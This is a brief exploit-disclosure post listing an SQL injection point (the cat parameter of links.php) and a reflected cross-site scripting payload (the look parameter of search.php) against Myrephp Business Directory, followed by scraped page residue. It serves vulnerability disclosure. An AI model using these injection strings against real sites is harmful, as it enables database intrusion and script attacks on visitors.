# Exploit Title: Myrephp Business Directory, Multiple Vulnerabilities # Date: 13.10.201 # Exploit Author: d3b4g # Vendor Homepage:http://myrephp.com # Software Link: http://myrephp.com/biz/ # Tested on: Windows 7 # Blog: d3b4g.me ---------------------------------------------------------------------------------- () SQL Injection : --------------------------- http://localhost/path/links.php?cat=1'[Insert Query] () Cross Site Scripting:- http:localhost/path/search.php?keywords1=&keywords2=&look=%27%20onmouseover%3dprompt%28945724%29%20bad%3d%27&nolinks1=10&order=city&page=2&sort=ASCБрой прочитания на тази страница: 677
Myrephp Business Directory Multiple Vulnerabilities